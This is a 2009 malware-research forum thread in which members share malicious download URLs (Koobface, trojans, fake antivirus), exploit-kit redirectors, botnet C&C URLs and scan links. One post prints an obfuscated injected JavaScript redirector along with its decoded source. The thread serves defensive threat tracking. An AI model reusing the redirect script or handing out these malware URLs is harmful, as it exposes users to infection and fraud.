Author Topic: daily something......  (Read 797415 times)

0 Members and 2 Guests are viewing this topic.

May 15, 2009, 03:16:58 am
Reply #405

CkreM

  • Special Access
  • Hero Member

  • Offline
  • *

  • 567
Koobface:
Code: [Select]
71.8.59.249/setup.exeTrojan:
Code: [Select]
vexpen.jino.ru/file/bot.exehttp://www.virustotal.com/analisis/60c864a624b006b5c3a1e9875ae99c4a

Fake AV:
Code: [Select]
antvirushelpv1.com(download link aint working atm but will work soon i guess..)

Code: [Select]
securityhelpcenter.com/1/  (currently only have a link to the fake payment site at:
Code: [Select]
live-payment-system.com/buy.php?nh=1&id=
Mal-Aware

May 15, 2009, 03:29:06 am
Reply #406

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
http://antvirushelpv1.com/download.php?id=2004

;)

Downloads: Install_2004.exe (132K)

Actually just came across it whilst researching a malicious URL in the Google results that redirected me to it;

qualitycollisionbodyshop.com/gkxtd/zunet/cadets.htm

You've got to load it with a Google referer string though, or it'll redir you to nothingsville courtesy of;

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.7 Results
Source code for: http://qualitycollisionbodyshop.com/gkxtd/zunet/2.js
Server IP: 76.162.102.189 [ rev.opentransfer.com.189.102.162.76.in-addr.arpa ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 15 May 2009
Time: 04:22:43:22
*****************************************************************

eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,102,40,41,123,13,10,118,97,114,32,114,61,100,111,99,117,109,101,110,116,46,114,101,102,101,114,114,101,114,44,116,61,34,34,44,113,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,103,111,111,103,108,101,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,109,115,110,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,121,97,104,111,111,46,34,41,33,61,45,49,41,116,61,34,112,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,97,108,116,97,118,105,115,116,97,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,97,111,108,46,34,41,33,61,45,49,41,116,61,34,113,117,101,114,121,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,97,115,107,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,99,111,109,99,97,115,116,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,98,101,108,108,115,111,117,116,104,46,34,41,33,61,45,49,41,116,61,34,115,116,114,105,110,103,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,110,101,116,115,99,97,112,101,46,34,41,33,61,45,49,41,116,61,34,113,117,101,114,121,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,109,121,119,101,98,115,101,97,114,99,104,46,34,41,33,61,45,49,41,116,61,34,115,101,97,114,99,104,102,111,114,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,112,101,111,112,108,101,112,99,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,115,116,97,114,119,97,114,101,46,34,41,33,61,45,49,41,116,61,34,113,114,121,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,101,97,114,116,104,108,105,110,107,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,116,46,108,101,110,103,116,104,38,38,40,40,113,61,114,46,105,110,100,101,120,79,102,40,34,63,34,43,116,43,34,61,34,41,41,33,61,45,49,124,124,40,113,61,114,46,105,110,100,101,120,79,102,40,34,38,34,43,116,43,34,61,34,41,41,33,61,45,49,41,41,32,13,10,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,32,61,32,40,34,104,116,116,112,58,47,47,111,112,101,110,115,116,97,114,49,46,110,101,116,47,105,110,46,99,103,105,63,57,38,115,101,111,114,101,102,61,34,43,101,110,99,111,100,101,85,82,73,67,111,109,112,111,110,101,110,116,40,100,111,99,117,109,101,110,116,46,114,101,102,101,114,114,101,114,41,43,34,38,112,97,114,97,109,101,116,101,114,61,36,107,101,121,119,111,114,100,38,115,101,61,36,115,101,38,117,114,61,49,38,72,84,84,80,95,82,69,70,69,82,69,82,61,34,43,101,110,99,111,100,101,85,82,73,67,111,109,112,111,110,101,110,116,40,100,111,99,117,109,101,110,116,46,85,82,76,41,43,34,38,100,101,102,97,117,108,116,95,107,101,121,119,111,114,100,61,100,101,102,97,117,108,116,34,41,59,32,13,10,125,13,10,13,10,119,105,110,100,111,119,46,111,110,70,111,99,117,115,32,61,32,102,40,41));

Which decodes to;

Code: [Select]
function f(){
var r=document.referrer,t="",q;
if(r.indexOf("google.")!=-1)t="q";
if(r.indexOf("msn.")!=-1)t="q";
if(r.indexOf("yahoo.")!=-1)t="p";
if(r.indexOf("altavista.")!=-1)t="q";
if(r.indexOf("aol.")!=-1)t="query";
if(r.indexOf("ask.")!=-1)t="q";
if(r.indexOf("comcast.")!=-1)t="q";
if(r.indexOf("bellsouth.")!=-1)t="string";
if(r.indexOf("netscape.")!=-1)t="query";
if(r.indexOf("mywebsearch.")!=-1)t="searchfor";
if(r.indexOf("peoplepc.")!=-1)t="q";
if(r.indexOf("starware.")!=-1)t="qry";
if(r.indexOf("earthlink.")!=-1)t="q";
if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1))
window.location = ("http://openstar1.net/in.cgi?9&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=default");
}

window.onFocus = f()

/edit

http://www.virustotal.com/analisis/d3008ef63c7db98bc3da9b63a3e567d2
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 15, 2009, 04:00:57 am
Reply #407

CkreM

  • Special Access
  • Hero Member

  • Offline
  • *

  • 567
i actually can download it directly(
Code: [Select]
http://antvirushelpv1.com/download.php?id=2004)
Mal-Aware

May 15, 2009, 04:09:22 am
Reply #408

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
You can, or can't?

/edit

It was the .js file on the domain that redirs to the rogue domain I had to supply the Google referer to btw, not the rogue domain ;)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 15, 2009, 05:55:27 am
Reply #409

CkreM

  • Special Access
  • Hero Member

  • Offline
  • *

  • 567
You can, or can't?

/edit

It was the .js file on the domain that redirs to the rogue domain I had to supply the Google referer to btw, not the rogue domain ;)

 ;D
Mal-Aware

May 18, 2009, 03:37:50 am
Reply #410

CkreM

  • Special Access
  • Hero Member

  • Offline
  • *

  • 567
Mal-Aware

May 18, 2009, 11:51:34 am
Reply #411

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ruining the bad guy's day

May 19, 2009, 06:25:21 am
Reply #412

CkreM

  • Special Access
  • Hero Member

  • Offline
  • *

  • 567
Exploit/trojan:
Code: [Select]
pimpalas.cn/yespdf/index.phphttp://wepawet.iseclab.org/view.php?hash=d8776172d856e083138ff2828f1c28ae&t=1242712689&type=js

Redirect to fake AV:
Code: [Select]
gogenscan.com
gozonescan.com
Fake AV:
Code: [Select]
fanscan4.info
miniscan4.info
scanlist6.com
luxscan4.info
Mal-Aware

May 19, 2009, 11:50:56 am
Reply #413

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Code: [Select]
pearch.net/in.cgi?7
redirects to
Code: [Select]
europpc.com/search.php?iw=1&links=
links redirect to
Code: [Select]
wplstr.net/in.cgi?20
redirects to fake system check
Code: [Select]
systemstabilityscan.com/5
starts download
Code: [Select]
http://adioro.com/download.php?aid=5
redirects to
Code: [Select]
dl1.adioro.com/get.php?track_id=5
downloads
Code: [Select]
dl1.adioro.com/distribs/5/registryoptimizer.exehttp://www.virustotal.com/de/analisis/99110a3a11c3cba50d7725b2453813ec 0/40
MD5...: fcd4b853dcea9d412fab09c66134058a
Ruining the bad guy's day

May 19, 2009, 03:52:16 pm
Reply #414

Malware-Web-Threats

  • Special Members
  • Hero Member

  • Offline
  • *

  • 354
    • MalwareURL
72.47.253.37

redirects to exploits:
Code: [Select]
hxxp://findbigbrother.cn:8080/ts/in.cgi?pepsi6
hxxp://bestwebfind.cn:8080/ts/in.cgi?pepsi11
hxxp://findyourbigwhy.cn:8080/ts/in.cgi?pepsi7
hxxp://findbigboob.cn:8080/ts/in.cgi?pepsi6
Wepawet
Wepawet
Wepawet
The latest has no report (too many submissions for wepawet since hours)

May 19, 2009, 04:11:26 pm
Reply #415

Malware-Web-Threats

  • Special Members
  • Hero Member

  • Offline
  • *

  • 354
    • MalwareURL
redirects to exploits
91.212.41.119
Code: [Select]
hxxp://silzefos.cn/s/in.cgi?13
Wepawet
Registrant: Meng Qun / janglkd@ yeah.net

exploits / trojan
221.5.74.52
Code: [Select]
hxxp://profit-marketing.net/earningn/t.php
hxxp://profit-marketing.net/earningn/ll.php?b=2&s=snaj
hxxp://profit-marketing.net/earningn/ll.php?b=1&s=Co11ab
hxxp://profit-marketing.net/earningn/ll.php?b=1&s=ODAY
hxxp://profit-marketing.net/earningn/ll.php?b=1&s=Ut1l
hxxp://profit-marketing.net/imocs.swf
hxxp://profit-marketing.net/inocs.pdf
Registrant: Michell.Gregory2009@ yahoo.com

Wepawet (exploit)

VirusTotal (flash) - 3/39 (7.69%)
Wepawet (flash)

VirusTotal (pdf) - 7/39 (17.95%)
VirusTotal (exe) - 3/39 (7.69%)

Anubis
ThreatExpert

Botnet C&C:
213.182.197.249
Code: [Select]
hxxp://krottorot.cn/ging/controller.php?action=bot&entity_list=&uid=&first=1&guid=1824245000&rnd=946862
hxxp://krottorot.cn/ging/controller.php?action=report&guid=0&rnd=946862&uid=&entity=1241486361:unique_start
Source: Anubis
Registrant: Chen / chen.poon1732646@ yahoo.com

Botnet C&C:
78.129.166.5
Code: [Select]
hxxp://ftpshki.cn/admin/controller.php?action=bot&entity_list=&uid=1&first=1&guid=1824245000&rnd=2514213
hxxp://ftpshki.cn/admin/controller.php?action=report&guid=0&rnd=25142137&uid=1&entity=1238216956:unique_start
hxxp://ftpshki.cn/admin/receiver/online
Source: Anubis
Registrant: SmithJohn / Chehhost@ admin.ru

May 19, 2009, 05:42:36 pm
Reply #416

Malware-Web-Threats

  • Special Members
  • Hero Member

  • Offline
  • *

  • 354
    • MalwareURL
91.209.163.201 - vl01.c76.fvtn.net
Code: [Select]
hxxp://download.official-emule.com/Live-Player_setup.php
hxxp://download.original-solitaire.com/Live-Player_setup.php

91.209.163.202 - vl02.c76.fvtn.net
Code: [Select]
hxxp://download.go-turf.com/Live-Player_setup.php
hxxp://download.gomusic.com/Live-Player_setup.php
hxxp://download.littlesmileys.com/Live-Player_setup.php
hxxp://download.official-bittorrent.com/Live-Player_setup.php
hxxp://download.schnellsucher.com/Live-Player_setup.php
hxxp://download.search-solver.com/Live-Player_setup.php
hxxp://download.smilymail.com/Live-Player_setup.php
hxxp://download.trovarapido.com/Live-Player_setup.php
hxxp://download.web-mediaplayer.com/Live-Player_setup.php

91.209.163.203 - vl03.c76.fvtn.net
Code: [Select]
hxxp://download.backstripgirls.com/Live-Player_setup.php
hxxp://download.buscalisto.com/Live-Player_setup.php
hxxp://download.games-attack.com/Live-Player_setup.php
hxxp://download.go-astro.com/Live-Player_setup.php
hxxp://download.gomusic.net/Live-Player_setup.php
hxxp://download.hot-tv.com/Live-Player_setup.php
hxxp://download.speed-downloading.com/Live-Player_setup.php

same file:
Quote
File size: 233000 bytes
MD5: 67a6bfee47f1e6c7d1c03d8c02df6b95
VirusTotal - 12/40 (30%)

Registrant: Ramon Viladomiu / 2ffba9ee4ff19e8587163b873c03ff22-913471@ contact.gandi.net

related to: http://www.siteadvisor.com/sites/live-player.com

May 19, 2009, 07:28:26 pm
Reply #417

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ruining the bad guy's day

May 20, 2009, 05:22:23 am
Reply #418

CkreM

  • Special Access
  • Hero Member

  • Offline
  • *

  • 567
Emold:
Code: [Select]
ku98.biz/ghost/dia.exehttp://www.virustotal.com/analisis/6e833596122310890ab85283b612aa02
Trojan:
Code: [Select]
rezident77.ru/files/cry.exehttp://www.virustotal.com/analisis/860b0c60fcc25b00b58075cff3492cd8
Koobface:
Code: [Select]
121.13.55.49/setup.exe
79.181.99.78/setup.exe
Mal-Aware

May 21, 2009, 06:20:21 am
Reply #419

CkreM

  • Special Access
  • Hero Member

  • Offline
  • *

  • 567
Trojan:
Code: [Select]
samog0n.info/analyse/3xNt0f6b9e3R.exehttp://www.virustotal.com/analisis/3f6196088309178a7ced521f2ac381c0
Trojan:
Code: [Select]
tamporn.net/indir.exe http://www.virustotal.com/analisis/33ac4a6f5025b70f407812c3637cb084
Trojan
Code: [Select]
yourelitehosting.ru/explorer.exehttp://www.virustotal.com/analisis/b8fcb40a031230efbfaa9b3e0ff6e8a9

Redirects to rogue:
Code: [Select]
spyware-systems.info/0/go.php?sid=2 Exploit/trojan:
Code: [Select]
dr-w-corporation.ru/404/cache/readme.pdfhttp://wepawet.iseclab.org/view.php?hash=ceda3c3478def91606b1f1eff10aee05&t=1242931942&type=js
Mal-Aware